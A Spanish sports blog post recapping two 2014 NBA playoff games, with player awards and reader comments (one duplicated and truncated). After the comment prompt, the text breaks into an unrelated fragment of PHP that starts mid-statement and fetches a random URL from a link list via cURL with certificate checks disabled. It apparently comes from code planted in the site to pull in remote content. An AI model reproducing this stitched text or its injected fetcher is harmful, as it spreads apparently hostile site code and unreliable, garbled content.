La Crónica: Don Chris Paul

06 de May de 2014 por Simon

Primera jornada de la segunda ronda de estos magníficos Play Off 2014 que estamos disfrutando. Por lo visto ayer parece que la tendencia va a continuar porque los dos partidos que abrían fuego se los terminaron llevando los equipos visitantes cambiando así el factor cancha de sus respectivas series.

Los Angeles Clippers no encontraron rival en los Thunders. Desde el primer minuto Chris Paul quiso demostrar quién es y volvió locos a todos los rivales y a todos los aficionados que desde el sillón asistimos a una demostración histórica de dominio de un jugador sobre un equipo rival al completo. El base de los Clippers terminó el partido con 32 puntos y 10 asistencias jugando apenas 27 minutos y tras fallar sólo 2 de sus 14 lanzamientos y anotar 8 triples. Una auténtica barbaridad. Oklahoma directamente no existió, con el primer puñetazo cayeron al suelo y ya no se levantaron. Para hacerse una idea del dominio que ejercieron los de Doc Rivers sólo hay que saber que en el tercer cuarto ya habían superado la barrera de los 100 puntos y que en el último los titulares no tuvieron ni que quitarse el chándal. Durant y Westbrook estuvieron muy solos y enfrente se encontraron un gran equipo al que no pudieron ni soñar hacer sombra. La victoria fue muy contundente (122-105)  a pesar de que el marcador no muestra ni una décima parte del dominio ejercido por los visitantes en la noche de ayer. Es obvio que los Clippers no van a tener este nivel de acierto en todos los partidos por lo que los Thunder deberían ser capaces de competir en el próximo encuentro e igualar la serie. Dando por hecho que en ataque Durant y Wesstbrook van a continuar estando bastante solos, al menos en defensa el equipo debería dar lo máximo para tratar de frenar las embestidas de los angelinos. Al ritmo de juego con el que se disputó el partido de ayer es complicado que los Thunder se impongan pues los Clippers tienen más y mejores jugadores para llevarlo a cabo. 

También saltó la “sorpresa” en Indiana. Es curioso que en una serie entre el primero y el sexto de la conferencia casi todo el mundo dé como favorito a los Wizards y es que el mal momento que viven en Indiana parece no tener fin y ayer lo volvieron a demostrar. Lo señalábamos en la previa: el duelo entre Beal y Stephenson va a ser vital para el devenir de la serie. Ayer ese duelo se lo llevó el escolta de los Wizards que fue el gran protagonista del encuentro, dominando a su par y resultando vital en el último cuarto. Po rsu parte, Roy Hibbert, del que muchos creíamos que había vuelto tras el séptimo ante Hawks, se  encargó de mostrarnos que lo del otro día había sido una equivocación y que él sigue dispuesto a convertirse en el hazmerreír de la liga y un lastre para su equipo. Con un gran primer cuarto los jóvenes Wizards, liderados por Trevor Ariza (22 p, 6 de 6 en T3), ya lograron las primeras ventajas superiores a la decena de puntos y mantuvieron a los Pacers a remolque durante todo el encuentro. Tras el descanso parecía que los Pacers tiraban de amor propio y conseguían dejar a los capitalinos en apenas 13 puntos logrando reducir así la ventaja. Una vez más Indiana parecía despertar justo a tiempo. Pero fue en ese preciso instante, cuando el último cuarto alcanzaba su ecuador y los locales parecían echarse encima de los de Wittman cuando emergió la figura de Bradley Beal que con dos triples y un par de robos a Stephenson volvió a colocar a los Wizards 10 puntos arriba en el marcador. En los últimos 40 segundos los Pacers anotaron hasta 4 triples pero los Wizards se mostraron muy seguros desde el tiro libre y cerraron la victoria sin apuros (102-96). Los Wizards siguen siendo letales a domicilio: han jugado cuatro partidos fuera de casa y  cuentan por victoria todos ellos. Se les pone muy de cara la eliminatoria.

PREMIOS

MVP: Exhibición con mayúsculas y todas las letras (es decir, E-X-H-I-B-I-C-I-Ó-N) de Chris Paul. Destrozó a cualquier defensor que los Thunder le pusieran delante y cualquier esquema defensivo que inventara Brooks para acabar con 32 puntos (atención, 12 de 14 en TC y 8 de 9 en T3) y 10 asistencias. La mejor actuación de lo que llevamos de playoffs.

Sorpresa: Drew Gooden anotó 12 puntos y capturó 13 rebotes en apenas 18 minutos de juego. Hasta hace dos días el juego interior de los Pacers estaba bien considerado…

Decepción: El espejismo del séptimo partido no tuvo continuidad y Roy Hibbert volvió a terminar el partido con 0 puntos y 0 rebotes y una actitud impropia de un profesional. Y esta vez no puede alegar que enfrente no tenía pívots de verdad con los que emparejarse.

Esfuerzo en vano: Russell Westbrook (29 p -4 r – 4 a – 6 p) y Kevin Durant (25 p -4 r – 4 a – 3 p) fueron los mejores  de los Thunder pero estuvieron bastante humanos. Si a eso le sumamos que sus compañeros no estuvieron muy acertados… blanco y en botella.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Lo de Indiana/Hibbert podría ponerse en cuarentena hasta llegada la primera ronda,pero confirmadas las sensaciones ante Atlanta,lo que pasa por allí no se va a solucionar hasta que llegue el verano y se produzcan traspasos,así que ya no es sorpresa.Por cierto,repetición en cuanto a Stephenson apartado del banquillo cuando tiene descanso.Los Wizards muy serios,parece que Wittman ha acabo de hacer un gran trabajo y eso que es un tio q

      Citar

  2. Ruxixon dice:
    #2

    Lo de Indiana/Hibbert podría ponerse en cuarentena hasta llegada la primera ronda,pero confirmadas las sensaciones ante Atlanta,lo que pasa por allí no se va a solucionar hasta que llegue el verano y se produzcan traspasos,así que ya no es sorpresa.Por cierto,repetición en cuanto a Stephenson apartado del banquillo cuando tiene descanso.Los Wizards muy serios,parece que Wittman ha acabo de hacer un gran trabajo y eso que es un tio que no me despierta gran entusiasmo,pero oye,están ahí y por méritos propios,que esto era un objetivo que se metieron entre ceja y ceja desde que volvió Wall de la lesión.

      Citar

  3. Esteban dice:
    #3

    los Wizrds, algo beneficiados por rivales debiles, estan demostrando lo que pueden dar cuando estan todos sanos, cosa que no pasa muy seguido

      Citar

  4. Jose Luis dice:
    #4

    la verdad es que las dos victoria se comentaron en un increíble porcentaje en T3 que no va a darse todas las noches.

    Veremos que tal… ahora han de recuperar factor cancha ambos conjuntos, los Wizards están muy serios y los Clippers son muy buenos… buenas series vamos a ver.

      Citar

  5. rumbero dice:
    #5

    Vaya pedazo de PO que se está marcando Beal en su debut. Me tiene impresionado como se las juega. Mucha clase y sangre fría. Y forma muy buen perímetro con Wall y Trevor “Contract Year” Ariza. Cada vez que los veo jugar me molan más estos Wizards

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>